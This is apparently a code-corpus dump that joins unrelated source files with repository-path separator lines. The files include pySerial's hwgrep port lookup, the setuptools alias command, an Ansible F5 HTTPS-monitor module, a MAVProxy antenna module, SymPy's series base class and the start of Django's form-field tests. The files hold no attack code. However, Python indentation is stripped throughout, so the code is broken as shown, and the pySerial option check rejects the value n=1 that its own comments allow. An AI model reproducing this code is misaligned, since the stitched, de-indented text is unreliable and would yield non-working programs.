# find ports by searching the string descriptions.
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C) 2011-2015 Chris Liechti <[email protected]>
#
# SPDX-License-Identifier: BSD-3-Clause
#
# URL format: hwgrep://<regexp>&<option>
#
# where <regexp> is a Python regexp according to the re module
#
# violating the normal definition for URLs, the character `&` is used to
# separate parameters from the arguments (instead of `?`, but the question mark
# is heavily used in regexp'es)
#
# options:
# n=<N> pick the N'th entry instead of the first one (numbering starts at 1)
# skip_busy tries to open port to check if it is busy, fails on posix as ports are not locked!
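#
# Illustrative URLs (a sketch based on the options above; the regular
# expressions are examples, not part of this module):
#   hwgrep://USB                 first port whose description matches "USB"
#   hwgrep://0403:6001&n=2       second port matching an FTDI VID:PID
#   hwgrep://Arduino&skip_busy   first non-busy port matching "Arduino"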
import serial
import serial.tools.list_ports
try:
basestring
except NameError:
basestring = str # python 3
class Serial(serial.Serial):
"""Just inherit the native Serial port implementation and patch the port property."""
@serial.Serial.port.setter
def port(self, value):
"""translate port name before storing it"""
if isinstance(value, basestring) and value.startswith('hwgrep://'):
serial.Serial.port.__set__(self, self.from_url(value))
else:
serial.Serial.port.__set__(self, value)
def from_url(self, url):
"""extract host and port from an URL string"""
if url.lower().startswith("hwgrep://"):
url = url[9:]
n = 0
test_open = False
args = url.split('&')
regexp = args.pop(0)
for arg in args:
if '=' in arg:
option, value = arg.split('=', 1)
else:
option = arg
value = None
if option == 'n':
# pick n'th element
n = int(value) - 1
if n < 1:
raise ValueError('option "n" expects a positive integer larger than 1: %r' % (value,))
elif option == 'skip_busy':
# open to test if port is available. not the nicest way..
test_open = True
else:
raise ValueError('unknown option: %r' % (option,))
# use a for loop to get the 1st element from the generator
for port, desc, hwid in sorted(serial.tools.list_ports.grep(regexp)):
if test_open:
try:
s = serial.Serial(port)
except serial.SerialException:
# it has some error, skip this one
continue
else:
s.close()
if n:
n -= 1
continue
return port
else:
raise serial.SerialException('no ports found matching regexp %r' % (url,))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
s = Serial(None)
s.port = 'hwgrep://ttyS0'
print(s)
|
linktlh/Toontown-journey | refs/heads/master | toontown/nametag/NametagFloat2d.py | 3 | from pandac.PandaModules import Point3
from toontown.nametag.NametagFloat3d import NametagFloat3d
class NametagFloat2d(NametagFloat3d):
def doBillboardEffect(self):
pass
def update(self):
NametagFloat3d.update(self)
self.updateClickRegion()
def setClickRegionFrame(self, left, right, bottom, top):
mat = self.contents.getNetTransform().getMat()
left, _, top = mat.xformPoint(Point3(left, 0, top))
right, _, bottom = mat.xformPoint(Point3(right, 0, bottom))
self.region.setFrame(left, right, bottom, top)
|
nhenezi/kuma | refs/heads/master | vendor/packages/setuptools/setuptools/command/alias.py | 32 | import distutils, os
from setuptools import Command
from distutils.util import convert_path
from distutils import log
from distutils.errors import *
from setuptools.command.setopt import edit_config, option_base, config_file
def shquote(arg):
"""Quote an argument for later parsing by shlex.split()"""
for c in '"', "'", "\\", "#":
if c in arg: return repr(arg)
if arg.split()!=[arg]:
return repr(arg)
return arg
class alias(option_base):
"""Define a shortcut that invokes one or more commands"""
description = "define a shortcut to invoke one or more commands"
command_consumes_arguments = True
user_options = [
('remove', 'r', 'remove (unset) the alias'),
] + option_base.user_options
boolean_options = option_base.boolean_options + ['remove']
def initialize_options(self):
option_base.initialize_options(self)
self.args = None
self.remove = None
def finalize_options(self):
option_base.finalize_options(self)
if self.remove and len(self.args)!=1:
raise DistutilsOptionError(
"Must specify exactly one argument (the alias name) when "
"using --remove"
)
def run(self):
aliases = self.distribution.get_option_dict('aliases')
if not self.args:
print "Command Aliases"
print "---------------"
for alias in aliases:
print "setup.py alias", format_alias(alias, aliases)
return
elif len(self.args)==1:
alias, = self.args
if self.remove:
command = None
elif alias in aliases:
print "setup.py alias", format_alias(alias, aliases)
return
else:
print "No alias definition found for %r" % alias
return
else:
alias = self.args[0]
command = ' '.join(map(shquote,self.args[1:]))
edit_config(self.filename, {'aliases': {alias:command}}, self.dry_run)
def format_alias(name, aliases):
source, command = aliases[name]
if source == config_file('global'):
source = '--global-config '
elif source == config_file('user'):
source = '--user-config '
elif source == config_file('local'):
source = ''
else:
source = '--filename=%r' % source
return source+name+' '+command
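# Usage sketch (illustrative command lines for the alias command defined
# above):
#   python setup.py alias rebuild clean build   # define alias "rebuild"
#   python setup.py alias                       # list all aliases
#   python setup.py alias --remove rebuild      # unset the alias again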
|
jjmiranda/edx-platform | refs/heads/master | cms/djangoapps/contentstore/tests/test_request_event.py | 234 | """Tests for CMS's requests to logs"""
import mock
from django.test import TestCase
from django.core.urlresolvers import reverse
from contentstore.views.helpers import event as cms_user_track
class CMSLogTest(TestCase):
"""
Tests that request to logs from CMS return 204s
"""
def test_post_answers_to_log(self):
"""
Checks that student answer requests submitted to cms's "/event" url
via POST are correctly returned as 204s
"""
requests = [
{"event": "my_event", "event_type": "my_event_type", "page": "my_page"},
{"event": "{'json': 'object'}", "event_type": unichr(512), "page": "my_page"}
]
with mock.patch.dict('django.conf.settings.FEATURES', {'ENABLE_SQL_TRACKING_LOGS': True}):
for request_params in requests:
response = self.client.post(reverse(cms_user_track), request_params)
self.assertEqual(response.status_code, 204)
def test_get_answers_to_log(self):
"""
Checks that student answer requests submitted to cms's "/event" url
via GET are correctly returned as 204s
"""
requests = [
{"event": "my_event", "event_type": "my_event_type", "page": "my_page"},
{"event": "{'json': 'object'}", "event_type": unichr(512), "page": "my_page"}
]
with mock.patch.dict('django.conf.settings.FEATURES', {'ENABLE_SQL_TRACKING_LOGS': True}):
for request_params in requests:
response = self.client.get(reverse(cms_user_track), request_params)
self.assertEqual(response.status_code, 204)
|
maithreyee/python-koans | refs/heads/master | python3/koans/local_module_with_all_defined.py | 130 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__all__ = (
'Goat',
'_Velociraptor'
)
class Goat:
@property
def name(self):
return "George"
class _Velociraptor:
@property
def name(self):
return "Cuddles"
class SecretDuck:
@property
def name(self):
return "None of your business"
|
luiseduardohdbackup/odoo | refs/heads/8.0 | addons/purchase_double_validation/__openerp__.py | 260 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Double Validation on Purchases',
'version' : '1.1',
'category': 'Purchase Management',
'depends' : ['base','purchase'],
'author' : 'OpenERP SA',
'description': """
Double-validation for purchases exceeding minimum amount.
=========================================================
This module modifies the purchase workflow in order to validate purchases that
exceeds minimum amount set by configuration wizard.
""",
'website': 'https://www.odoo.com/page/purchase',
'data': [
'purchase_double_validation_workflow.xml',
'purchase_double_validation_installer.xml',
'purchase_double_validation_view.xml',
],
'test': [
'test/purchase_double_validation_demo.yml',
'test/purchase_double_validation_test.yml'
],
'demo': [],
'installable': True,
'auto_install': False
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
yfried/ansible | refs/heads/devel | lib/ansible/modules/network/f5/bigip_monitor_https.py | 1 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_monitor_https
short_description: Manages F5 BIG-IP LTM https monitors
description: Manages F5 BIG-IP LTM https monitors.
version_added: 2.5
options:
name:
description:
- Monitor name.
required: True
description:
description:
- The description of the monitor.
version_added: 2.7
parent:
description:
- The parent template of this monitor template. Once this value has
been set, it cannot be changed. By default, this value is the C(https)
parent on the C(Common) partition.
default: /Common/https
send:
description:
- The send string for the monitor call. When creating a new monitor, if
this value is not provided, the default C(GET /\\r\\n) will be used.
receive:
description:
- The receive string for the monitor call.
receive_disable:
description:
- This setting works like C(receive), except that the system marks the node
or pool member disabled when its response matches the C(receive_disable)
string but not C(receive). To use this setting, you must specify both
C(receive_disable) and C(receive).
ip:
description:
- IP address part of the IP/port definition. If this parameter is not
provided when creating a new monitor, then the default value will be
'*'.
port:
description:
- Port address part of the IP/port definition. If this parameter is not
provided when creating a new monitor, then the default value will be
'*'. Note that if specifying an IP address, a value between 1 and 65535
        must be specified.
interval:
description:
- The interval specifying how frequently the monitor instance of this
template will run. If this parameter is not provided when creating
a new monitor, then the default value will be 5. This value B(must)
be less than the C(timeout) value.
timeout:
description:
- The number of seconds in which the node or service must respond to
the monitor request. If the target responds within the set time
period, it is considered up. If the target does not respond within
the set time period, it is considered down. You can change this
number to any number you want, however, it should be 3 times the
interval number of seconds plus 1 second. If this parameter is not
provided when creating a new monitor, then the default value will be 16.
time_until_up:
description:
- Specifies the amount of time in seconds after the first successful
response before a node will be marked up. A value of 0 will cause a
node to be marked up immediately after a valid response is received
from the node. If this parameter is not provided when creating
a new monitor, then the default value will be 0.
target_username:
description:
- Specifies the user name, if the monitored target requires authentication.
target_password:
description:
- Specifies the password, if the monitored target requires authentication.
ssl_profile:
description:
- Specifies the SSL profile to use for the HTTPS monitor.
- Defining SSL profiles enables refined customization of the SSL attributes
for an HTTPS monitor.
- This parameter is only supported on BIG-IP versions 13.x and later.
version_added: 2.8
partition:
description:
- Device partition to manage resources on.
default: Common
state:
description:
- When C(present), ensures that the monitor exists.
- When C(absent), ensures the monitor is removed.
default: present
choices:
- present
- absent
version_added: 2.5
notes:
- Requires BIG-IP software version >= 12
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create HTTPS Monitor
bigip_monitor_https:
name: my_http_monitor
state: present
ip: 10.10.10.10
provider:
server: lb.mydomain.com
user: admin
password: secret
delegate_to: localhost
- name: Remove HTTPS Monitor
bigip_monitor_https:
name: my_http_monitor
state: absent
provider:
server: lb.mydomain.com
user: admin
password: secret
delegate_to: localhost
'''
RETURN = r'''
parent:
description: New parent template of the monitor.
returned: changed
type: string
sample: https
ip:
description: The new IP of IP/port definition.
returned: changed
type: string
sample: 10.12.13.14
interval:
description: The new interval in which to run the monitor check.
returned: changed
type: int
sample: 2
description:
description: The description of the monitor.
returned: changed
type: str
sample: Important Monitor
timeout:
description: The new timeout in which the remote system must respond to the monitor.
returned: changed
type: int
sample: 10
time_until_up:
description: The new time in which to mark a system as up after first successful response.
returned: changed
type: int
sample: 2
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.ipaddress import is_valid_ip
from library.module_utils.network.f5.compare import cmp_str_with_none
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.ipaddress import is_valid_ip
from ansible.module_utils.network.f5.compare import cmp_str_with_none
class Parameters(AnsibleF5Parameters):
api_map = {
'timeUntilUp': 'time_until_up',
'defaultsFrom': 'parent',
'recv': 'receive',
'recvDisable': 'receive_disable',
'sslProfile': 'ssl_profile',
}
api_attributes = [
'timeUntilUp',
'defaultsFrom',
'interval',
'timeout',
'recv',
'send',
'destination',
'username',
'password',
'recvDisable',
'description',
'sslProfile',
]
returnables = [
'parent',
'send',
'receive',
'ip',
'port',
'interval',
'timeout',
'time_until_up',
'receive_disable',
'description',
'ssl_profile',
]
updatables = [
'destination',
'send',
'receive',
'interval',
'timeout',
'time_until_up',
'target_username',
'target_password',
'receive_disable',
'description',
'ssl_profile',
]
@property
def username(self):
return self._values['target_username']
@property
def password(self):
return self._values['target_password']
@property
def destination(self):
if self.ip is None and self.port is None:
return None
destination = '{0}:{1}'.format(self.ip, self.port)
return destination
@destination.setter
def destination(self, value):
ip, port = value.split(':')
self._values['ip'] = ip
self._values['port'] = port
@property
def interval(self):
if self._values['interval'] is None:
return None
        # Per BZ617284, the BIG-IP UI does not raise a warning about this.
        # So I do.
        if not 1 <= int(self._values['interval']) <= 86400:
raise F5ModuleError(
"Interval value must be between 1 and 86400"
)
return int(self._values['interval'])
@property
def timeout(self):
if self._values['timeout'] is None:
return None
return int(self._values['timeout'])
@property
def ip(self):
if self._values['ip'] is None:
return None
elif self._values['ip'] in ['*', '0.0.0.0']:
return '*'
elif is_valid_ip(self._values['ip']):
return self._values['ip']
raise F5ModuleError(
"The provided 'ip' parameter is not an IP address."
)
@property
def port(self):
if self._values['port'] is None:
return None
elif self._values['port'] == '*':
return '*'
return int(self._values['port'])
@property
def time_until_up(self):
if self._values['time_until_up'] is None:
return None
return int(self._values['time_until_up'])
@property
def parent(self):
if self._values['parent'] is None:
return None
result = fq_name(self.partition, self._values['parent'])
return result
@property
def type(self):
return 'https'
class ApiParameters(Parameters):
@property
def description(self):
if self._values['description'] in [None, 'none']:
return None
return self._values['description']
class ModuleParameters(Parameters):
@property
def description(self):
if self._values['description'] is None:
return None
elif self._values['description'] in ['none', '']:
return ''
return self._values['description']
@property
def ssl_profile(self):
if self._values['ssl_profile'] is None:
return None
if self._values['ssl_profile'] in ['', 'none']:
return ''
result = fq_name(self.partition, self._values['ssl_profile'])
return result
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
pass
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
result = self.__default(param)
return result
@property
def parent(self):
if self.want.parent != self.have.parent:
raise F5ModuleError(
"The parent monitor cannot be changed"
)
@property
def destination(self):
if self.want.ip is None and self.want.port is None:
return None
if self.want.port is None:
self.want.update({'port': self.have.port})
if self.want.ip is None:
self.want.update({'ip': self.have.ip})
if self.want.port in [None, '*'] and self.want.ip != '*':
raise F5ModuleError(
"Specifying an IP address requires that a port number be specified"
)
if self.want.destination != self.have.destination:
return self.want.destination
@property
def interval(self):
if self.want.timeout is not None and self.want.interval is not None:
if self.want.interval >= self.want.timeout:
raise F5ModuleError(
"Parameter 'interval' must be less than 'timeout'."
)
elif self.want.timeout is not None:
if self.have.interval >= self.want.timeout:
raise F5ModuleError(
"Parameter 'interval' must be less than 'timeout'."
)
elif self.want.interval is not None:
if self.want.interval >= self.have.timeout:
raise F5ModuleError(
"Parameter 'interval' must be less than 'timeout'."
)
if self.want.interval != self.have.interval:
return self.want.interval
@property
def ssl_profile(self):
if self.want.ssl_profile is None:
return None
if self.want.ssl_profile == '' and self.have.ssl_profile is None:
return None
if self.want.ssl_profile != self.have.ssl_profile:
return self.want.ssl_profile
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def description(self):
return cmp_str_with_none(self.want.description, self.have.description)
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.client.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def exists(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/monitor/https/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError:
return False
if resp.status == 404 or 'code' in response and response['code'] == 404:
return False
return True
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
self._set_default_creation_values()
if self.module.check_mode:
return True
self.create_on_device()
return True
def _set_default_creation_values(self):
if self.want.timeout is None:
self.want.update({'timeout': 16})
if self.want.interval is None:
self.want.update({'interval': 5})
if self.want.time_until_up is None:
self.want.update({'time_until_up': 0})
if self.want.ip is None:
self.want.update({'ip': '*'})
if self.want.port is None:
self.want.update({'port': '*'})
if self.want.send is None:
self.want.update({'send': 'GET /\r\n'})
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
uri = "https://{0}:{1}/mgmt/tm/ltm/monitor/https/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/ltm/monitor/https/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def absent(self):
if self.exists():
return self.remove()
return False
def remove_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/monitor/https/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.delete(uri)
if resp.status == 200:
return True
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/monitor/https/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
parent=dict(default='/Common/https'),
description=dict(),
send=dict(),
receive=dict(),
receive_disable=dict(required=False),
ip=dict(),
port=dict(type='int'),
interval=dict(type='int'),
timeout=dict(type='int'),
time_until_up=dict(type='int'),
target_username=dict(),
target_password=dict(no_log=True),
ssl_profile=dict(),
state=dict(
default='present',
choices=['present', 'absent']
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
|
aitormf/JdeRobot | refs/heads/master | src/drivers/MAVLinkServer/MAVProxy/modules/mavproxy_antenna.py | 16 | #!/usr/bin/env python
'''
antenna pointing module
Andrew Tridgell
June 2012
'''
import sys, os, time
from cuav.lib import cuav_util
from MAVProxy.modules.lib import mp_module
class AntennaModule(mp_module.MPModule):
def __init__(self, mpstate):
super(AntennaModule, self).__init__(mpstate, "antenna", "antenna pointing module")
self.gcs_location = None
self.last_bearing = 0
self.last_announce = 0
self.add_command('antenna', self.cmd_antenna, "antenna link control")
def cmd_antenna(self, args):
'''set gcs location'''
if len(args) != 2:
if self.gcs_location is None:
print("GCS location not set")
else:
print("GCS location %s" % str(self.gcs_location))
return
self.gcs_location = (float(args[0]), float(args[1]))
def mavlink_packet(self, m):
'''handle an incoming mavlink packet'''
if self.gcs_location is None and self.module('wp').wploader.count() > 0:
home = self.module('wp').wploader.wp(0)
self.gcs_location = (home.x, home.y)
print("Antenna home set")
if self.gcs_location is None:
return
if m.get_type() == 'GPS_RAW' and self.gcs_location is not None:
(gcs_lat, gcs_lon) = self.gcs_location
bearing = cuav_util.gps_bearing(gcs_lat, gcs_lon, m.lat, m.lon)
elif m.get_type() == 'GPS_RAW_INT' and self.gcs_location is not None:
(gcs_lat, gcs_lon) = self.gcs_location
bearing = cuav_util.gps_bearing(gcs_lat, gcs_lon, m.lat / 1.0e7, m.lon / 1.0e7)
else:
return
self.console.set_status('Antenna', 'Antenna %.0f' % bearing, row=0)
if abs(bearing - self.last_bearing) > 5 and (time.time() - self.last_announce) > 15:
self.last_bearing = bearing
self.last_announce = time.time()
self.say("Antenna %u" % int(bearing + 0.5))
def init(mpstate):
'''initialise module'''
return AntennaModule(mpstate)
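# Usage sketch inside the MAVProxy console (the coordinates are illustrative):
#   antenna                     show the configured GCS location
#   antenna -35.3632 149.1652   set the GCS location to lat/lon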
|
oliverlee/sympy | refs/heads/master | sympy/series/series_class.py | 89 | """
Contains the base class for series
Made using sequences in mind
"""
from __future__ import print_function, division
from sympy.core.expr import Expr
from sympy.core.singleton import S
from sympy.core.cache import cacheit
from sympy.core.compatibility import integer_types
class SeriesBase(Expr):
"""Base Class for series"""
@property
def interval(self):
"""The interval on which the series is defined"""
raise NotImplementedError("(%s).interval" % self)
@property
def start(self):
"""The starting point of the series. This point is included"""
raise NotImplementedError("(%s).start" % self)
@property
def stop(self):
"""The ending point of the series. This point is included"""
raise NotImplementedError("(%s).stop" % self)
@property
def length(self):
"""Length of the series expansion"""
raise NotImplementedError("(%s).length" % self)
@property
def variables(self):
"""Returns a tuple of variables that are bounded"""
return ()
@property
def free_symbols(self):
"""
This method returns the symbols in the object, excluding those
that take on a specific value (i.e. the dummy symbols).
"""
return (set(j for i in self.args for j in i.free_symbols)
.difference(self.variables))
@cacheit
def term(self, pt):
"""Term at point pt of a series"""
if pt < self.start or pt > self.stop:
raise IndexError("Index %s out of bounds %s" % (pt, self.interval))
return self._eval_term(pt)
def _eval_term(self, pt):
raise NotImplementedError("The _eval_term method should be added to"
"%s to return series term so it is available"
"when 'term' calls it."
% self.func)
def _ith_point(self, i):
"""
Returns the i'th point of a series
If start point is negative infinity, point is returned from the end.
Assumes the first point to be indexed zero.
Examples
========
TODO
"""
if self.start is S.NegativeInfinity:
initial = self.stop
step = -1
else:
initial = self.start
step = 1
return initial + i*step
def __iter__(self):
i = 0
while i < self.length:
pt = self._ith_point(i)
yield self.term(pt)
i += 1
def __getitem__(self, index):
if isinstance(index, integer_types):
index = self._ith_point(index)
return self.term(index)
elif isinstance(index, slice):
start, stop = index.start, index.stop
if start is None:
start = 0
if stop is None:
stop = self.length
return [self.term(self._ith_point(i)) for i in
range(start, stop, index.step or 1)]
|
binbin91/oms | refs/heads/master | asset/tests.py | 24123 | from django.test import TestCase
# Create your tests here.
|
DasIch/django | refs/heads/master | tests/forms_tests/tests/test_fields.py | 64 | # -*- coding: utf-8 -*-
"""
##########
# Fields #
##########
Each Field class does some sort of validation. Each Field has a clean() method,
which either raises django.forms.ValidationError or returns the "clean"
data -- usually a Unicode object, but, in some rare cases, a list.
Each Field's __init__() takes at least these parameters:
required -- Boolean that specifies whether the field is required.
True by default.
widget -- A Widget class, or instance of a Widget class, that should be
used for this Field when displaying it. Each Field has a default
Widget that it'll use if you don't specify this. In most cases,
the default widget is TextInput.
label -- A verbose name for this field, for use in displaying this field in
a form. By default, Django will use a "pretty" version of the form
field name, if the Field is part of a Form.
initial -- A value to use in this Field's initial display. This value is
*not* used as a fallback if data isn't given.
Other than that, the Field subclasses have class-specific options for
__init__(). For example, CharField has a max_length option.
"""
from __future__ import unicode_literals
import datetime
import os
import pickle
import re
import uuid
from decimal import Decimal
from unittest import skipIf
from django.core.files.uploadedfile import SimpleUploadedFile
from django.forms import (
BooleanField, CharField, ChoiceField, ComboField, DateField, DateTimeField,
DecimalField, DurationField, EmailField, Field, FileField, FilePathField,
FloatField, Form, GenericIPAddressField, HiddenInput, ImageField,
IntegerField, MultipleChoiceField, NullBooleanField, NumberInput,
PasswordInput, RadioSelect, RegexField, SlugField, SplitDateTimeField,
Textarea, TextInput, TimeField, TypedChoiceField, TypedMultipleChoiceField,
URLField, UUIDField, ValidationError, Widget, forms,
)
from django.test import SimpleTestCase
from django.utils import formats, six, translation
from django.utils._os import upath
from django.utils.duration import duration_string
try:
from PIL import Image
except ImportError:
Image = None
def fix_os_paths(x):
if isinstance(x, six.string_types):
return x.replace('\\', '/')
elif isinstance(x, tuple):
return tuple(fix_os_paths(list(x)))
elif isinstance(x, list):
return [fix_os_paths(y) for y in x]
else:
return x
class FieldsTests(SimpleTestCase):
def assertWidgetRendersTo(self, field, to):
class _Form(Form):
f = field
self.assertHTMLEqual(str(_Form()['f']), to)
def test_field_sets_widget_is_required(self):
self.assertTrue(Field(required=True).widget.is_required)
self.assertFalse(Field(required=False).widget.is_required)
def test_cooperative_multiple_inheritance(self):
class A(object):
def __init__(self):
self.class_a_var = True
super(A, self).__init__()
class ComplexField(Field, A):
def __init__(self):
super(ComplexField, self).__init__()
f = ComplexField()
self.assertTrue(f.class_a_var)
# CharField ###################################################################
def test_charfield_1(self):
f = CharField()
self.assertEqual('1', f.clean(1))
self.assertEqual('hello', f.clean('hello'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertEqual('[1, 2, 3]', f.clean([1, 2, 3]))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, None)
def test_charfield_2(self):
f = CharField(required=False)
self.assertEqual('1', f.clean(1))
self.assertEqual('hello', f.clean('hello'))
self.assertEqual('', f.clean(None))
self.assertEqual('', f.clean(''))
self.assertEqual('[1, 2, 3]', f.clean([1, 2, 3]))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, None)
def test_charfield_3(self):
f = CharField(max_length=10, required=False)
self.assertEqual('12345', f.clean('12345'))
self.assertEqual('1234567890', f.clean('1234567890'))
msg = "'Ensure this value has at most 10 characters (it has 11).'"
with self.assertRaisesMessage(ValidationError, msg):
f.clean('1234567890a')
self.assertEqual(f.max_length, 10)
self.assertEqual(f.min_length, None)
def test_charfield_4(self):
f = CharField(min_length=10, required=False)
self.assertEqual('', f.clean(''))
msg = "'Ensure this value has at least 10 characters (it has 5).'"
with self.assertRaisesMessage(ValidationError, msg):
f.clean('12345')
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertEqual('1234567890a', f.clean('1234567890a'))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, 10)
def test_charfield_5(self):
f = CharField(min_length=10, required=True)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
msg = "'Ensure this value has at least 10 characters (it has 5).'"
with self.assertRaisesMessage(ValidationError, msg):
f.clean('12345')
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertEqual('1234567890a', f.clean('1234567890a'))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, 10)
def test_charfield_length_not_int(self):
"""
        Ensure that setting min_length or max_length to something that is not a
        number raises an exception.
"""
self.assertRaises(ValueError, CharField, min_length='a')
self.assertRaises(ValueError, CharField, max_length='a')
self.assertRaises(ValueError, CharField, 'a')
def test_charfield_widget_attrs(self):
"""
Ensure that CharField.widget_attrs() always returns a dictionary.
Refs #15912
"""
# Return an empty dictionary if max_length is None
f = CharField()
self.assertEqual(f.widget_attrs(TextInput()), {})
self.assertEqual(f.widget_attrs(Textarea()), {})
# Otherwise, return a maxlength attribute equal to max_length
f = CharField(max_length=10)
self.assertEqual(f.widget_attrs(TextInput()), {'maxlength': '10'})
self.assertEqual(f.widget_attrs(PasswordInput()), {'maxlength': '10'})
self.assertEqual(f.widget_attrs(Textarea()), {'maxlength': '10'})
